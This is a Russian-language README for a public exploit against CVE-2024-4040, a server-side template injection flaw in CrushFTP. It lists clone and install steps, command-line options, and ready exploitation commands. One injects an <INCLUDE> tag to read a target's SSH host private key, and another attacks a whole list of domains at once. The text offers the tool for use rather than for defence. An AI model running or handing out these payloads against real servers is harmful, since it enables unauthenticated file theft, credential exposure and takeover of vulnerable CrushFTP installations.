
Эксплойт для уязвимости SSTI в CrushFTP (CVE-2024-4040), позволяющий неаутентифицированное чтение файлов, обход аутентификации и удаленное выполнение кода на затронутых серверах.
Уязвимость внедрения шаблонов на стороне сервера в CrushFTP во всех версиях до 10.7.1 и 11.1.0 на всех платформах позволяет неаутентифицированным удаленным злоумышленникам читать файлы из файловой системы за пределами VFS Sandbox, обходить аутентификацию для получения административного доступа и выполнять удаленный код на сервере.
git clone https://github.com/gotr00t0day/CVE-2024-4040.git
cd CVE-2024-4040
pip3 install -r requirements.txt
usage: CVE-2024-4040.py [-h] [-t TARGET] [-f FILE] [-d DOMAINS]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
target to scan
-f FILE, --file FILE file to fetch
-d DOMAINS, --domains DOMAINS
file containing list of domains
# УБЕДИТЕСЬ, ЧТО ИСПОЛЬЗУЕТЕ ТЕГ <INCLUDE> ИЛИ ЛЮБОЙ ДРУГОЙ ТЕГ ДЛЯ ЭКСПЛУАТАЦИИ ЦЕЛИ, ИНОГДА ТЕГИ НЕ НУЖНЫ.
# Эксплуатация одной цели
python3 CVE-2024-4040.py -t http://TARGET:8080 -f "<INCLUDE>ssh_host_rsa_key</INCLUDE>"
# Эксплуатация списка целей
python3 CVE-2024-4040.py -d ~/list.txt -f %hostname%
Пожалуйста, прочитайте АНАЛИЗ ATTACKERKB для лучшего понимания того, как использовать этот эксплойт.